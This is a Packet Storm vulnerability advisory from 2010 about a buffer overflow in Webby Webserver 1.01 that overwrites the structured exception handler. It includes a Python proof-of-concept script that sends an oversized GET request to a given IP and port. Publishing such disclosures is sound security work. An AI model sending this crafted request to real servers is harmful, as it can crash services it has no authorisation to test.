Webby Webserver 1.01 Buffer Overflow

2010-05-26T00:00:00
ID PACKETSTORM:89942
Type packetstorm
Reporter Michael Messner
Modified 2010-05-26T00:00:00

Description

                                        
                                            `---------------------------------------------  
  
Webby Webserver v1.01  
- Buffer overflow vulnerability with overwritten structured exception handler (SEH)  
Date: 25.05.2010  
  
---------------------------------------------  
  
- Description  
  
Webby is a small webserver for the windows operating system.  
  
- buffer overflow vulnerability  
  
The vulnerability can be triggered by sending a specially crafted HTTP GET request. Payload of the attached POC overwrites the SEH with NOPs.  
  
- Solution  
  
No known solution available.  
No contact details of the author found.  
  
- Credits  
  
The vulnerability was discovered by Michael Messner from Integralis  
michael#dot#messner#at#integralis#dot#com  
  
- Timeline  
  
25.05.2010 - Vulnerability discovered  
  
- Reference  
  
Download vulnerable software  
http://www.shareware.de/webby-webserver/  
  
- POC  
  
#!/usr/bin/python  
  
import socket  
import sys  
import os.path  
import time  
  
if len(sys.argv) < 2:  
print "Usage: webby.py <IP> <port>"  
sys.exit(0)  
  
ips = sys.argv[1]  
port = int(sys.argv[2])  
  
string = "A"*790  
string += "\x90"*4   
string += "\x42"*105   
  
method = "GET"  
print "starting POC for:", ips  
print ""  
  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
try:  
connect=s.connect((ips, port))  
except:  
print "no connection possible"  
sys.exit(1)  
  
payload = method + ' http://'+ ips + '/' + string + ' HTTP/1.0\x0d\x0a\x0d\x0a'  
  
print "\r\nsending payload"  
print "\n\rusing methode %s with buffersize of: %s" % (method,str(len(string)))  
print "..."  
  
print payload  
s.send(payload)  
print "finished with method %s and payload %s" % (method,payload)  
print "... check SEH"  
`